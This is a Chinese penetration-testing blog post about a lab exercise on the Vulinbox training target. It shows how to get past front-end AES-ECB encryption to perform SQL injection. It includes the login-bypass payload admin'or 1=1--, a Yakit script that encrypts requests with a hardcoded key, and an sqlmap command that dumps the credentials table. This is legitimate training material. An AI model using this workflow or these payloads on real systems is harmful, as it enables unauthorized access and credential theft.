首页 > 数据库 >渗透测试-前端加密之AES加密下的SQL注入

渗透测试-前端加密之AES加密下的SQL注入

时间:2024-12-15 18:12:45浏览次数:5  
标签:username AES 加密 admin -- SQL

本文是高级前端加解密与验签实战的第4篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过前端AES加密进行SQL注入。

CryptoJS.AES-被前端加密的SQL注入

绕过

SQL注入

前端代码和上文一样,都是通过AES加密请求的数据。

yaklang\common\vulinbox\db.go中可以看到相关后端代码:

数据库是SQLite类型,username参数是直接拼接查询的,所以存在SQL注入漏洞。

登录绕过

yaklang\common\vulinbox\vul_cryptojs_base.go

密码在第87行被赋值,密码是通过上面的GetUserByUsernameUnsafe获取的

输入{"username":"admin","password":"666666"}的SQL语句

select * from vulin_users where username = 'admin';

输入{"username":"admin'or 1=1--","password":"666666"}的SQL语句

select * from vulin_users where username = 'admin'or 1=1--';

相当于:

select * from vulin_users where true;

所以返回结果为表中的所有数据。

所以用户名随便输,密码输入表中存在的随意一个密码就能登陆成功:

sqlmap

使用Yakit的MITM 交互式劫持,热加载写上AES加密的代码

encryptData = (packet) => {
    body = poc.GetHTTPPacketBody(packet)
    hexKey = "31323334313233343132333431323334"
    key = codec.DecodeHex(hexKey)~
    data = codec.AESECBEncrypt(key /*type: []byte*/, body, nil /*type: []byte*/)~
    data = codec.EncodeBase64(data)
    body = f`{"data": "${data}","key": "${hexKey}"}`
    return string(poc.ReplaceBody(packet, body, false))
}
beforeRequest = func(req){
    return encryptData(req)
}

1.txt

POST /crypto/js/lib/aes/ecb/handler/sqli HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json

{"username":"admin","password":"admin"}

运行sqlmap

python .\sqlmap.py -r .\1.txt --proxy=http://127.0.0.1:8081 --batch -T vulin_users  -C username,password,role --dump

注入成功

CryptoJS.AES-被前端加密的 SQL 注入(Bypass认证)

绕过

这个前端代码与前面的还是一样的,都是AES ECB加密。

后端代码如下,可以看到查询语句在109行,用户名和密码都是直接拼接查询的。

SQL注入跟上面的操作一样,这里就不演示了,这里直接用热加载绕过登录。

POST /crypto/js/lib/aes/ecb/handler/sqli/bypass HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json

{"username":"admin'or 1=1--","password":""}

标签:username,AES,加密,admin,--,SQL
From: https://www.cnblogs.com/CVE-Lemon/p/18608265

相关文章

  • MySQL 中 EXISTS 和 IN 的区别是什么?
    在MySQL中,EXISTS和IN都用于在子查询中进行条件判断,但它们的使用场景和性能有一定区别。以下是EXISTS和IN的主要区别:1.功能和用法EXISTS:EXISTS用于检查子查询是否返回至少一行数据。如果子查询返回至少一行数据,EXISTS的条件为真,否则为假。EXISTS通常与SELE......
  • 什么是 Write-Ahead Logging (WAL) 技术?它的优点是什么?MySQL 中是否用到了 WAL?
    什么是Write-AheadLogging(WAL)技术?Write-AheadLogging(WAL)是一种用于数据库系统的日志记录技术,它要求在对数据库进行任何修改之前,所有的修改都必须先写入到日志文件中。这样做的目的是为了保证事务的持久性和一致性,确保即使数据库发生崩溃或意外关闭,未完成的事务数据也......
  • MySQL 数据库的性能优化方法有哪些?
    MySQL数据库性能优化是提高数据库响应速度和处理能力的重要手段。性能优化可以从多个层面入手,涵盖数据库设计、查询优化、硬件资源优化、配置调整等方面。以下是MySQL数据库常见的性能优化方法:1.数据库设计优化规范化与反规范化:规范化:通过规范化表结构,可以消除数据冗余,......
  • MySQL 的查询优化器如何选择执行计划?
    MySQL的查询优化器负责决定如何执行SQL查询,它会根据多个因素选择最优的执行计划。查询优化器的目标是选择一个成本最低、性能最优的执行计划,以便高效地处理查询。执行计划的选择是基于MySQL内部的统计信息和执行策略,下面是查询优化器选择执行计划的关键步骤和考虑因素:1.分......
  • MySQL 中 InnoDB 存储引擎与 MyISAM 存储引擎的区别是什么?
    MySQL中InnoDB存储引擎与MyISAM存储引擎是两种常见的存储引擎,它们在性能、事务支持、锁机制、数据完整性等方面存在一些显著的区别。以下是它们的主要区别:1.事务支持InnoDB:支持事务,符合ACID(原子性、一致性、隔离性、持久性)特性。事务管理通过COMMIT、ROLLBACK和SAVEP......
  • 在 MySQL 中存储金额数据,应该使用什么数据类型?
    在MySQL中存储金额数据时,最推荐使用DECIMAL类型(有时也叫做NUMERIC)。DECIMAL类型是一种精确的数字类型,适合存储具有小数位的金额数据,因为它不会像浮点数类型那样受到精度丢失的问题。DECIMAL类型的优点:高精度:DECIMAL类型能够精确存储货币值,避免浮动的误差。定义小数位数:......
  • 为什么不推荐在 MySQL 中直接存储图片、音频、视频等大容量内容?
    在MySQL中直接存储图片、音频、视频等大容量内容(通常称为BLOB数据)通常不被推荐,主要原因包括以下几点:1.性能问题存储效率:存储大容量文件(如图片、音频、视频等)会大幅增加数据库的存储负担。每次查询或插入时,处理这些大容量数据会消耗大量的I/O资源,可能导致数据库性能下降。数据......
  • MySQL 中 VARCHAR(100) 和 VARCHAR(10) 的区别是什么?
    在MySQL中,VARCHAR(100)和VARCHAR(10)都是变长字符串类型,但它们的主要区别在于能够存储的最大字符长度不同:1.存储长度VARCHAR(100):表示该字段可以存储最多100个字符(根据字符集的不同,一个字符可能占用1到多个字节)。如果存储的数据长度小于100个字符,MySQL只会占用实际......
  • Caused by_ net.sf.jsqlparser.parser.ParseException_ Encountered unexpected token
    问题:在xml里写完sql语句进行测试时抛出ParseException异常,如下:selectbasic.idas'id',frombasic_infobasic<iftest="request.behaveType!=null">innerjoinapply_infoapplyonapply.basic_info_id=basic.id&......
  • MySQL 中 DATETIME 和 TIMESTAMP 类型的区别是什么?
    在MySQL中,DATETIME和TIMESTAMP都是用于存储日期和时间的类型,但它们有一些关键的区别:1.存储方式和范围DATETIME:存储的日期和时间值是以“年-月-日时:分:秒”的格式表示。存储格式:DATETIME存储的是固定的日期和时间信息,不受时区的影响。范围:DATETIME的值范围为'1000-01-0......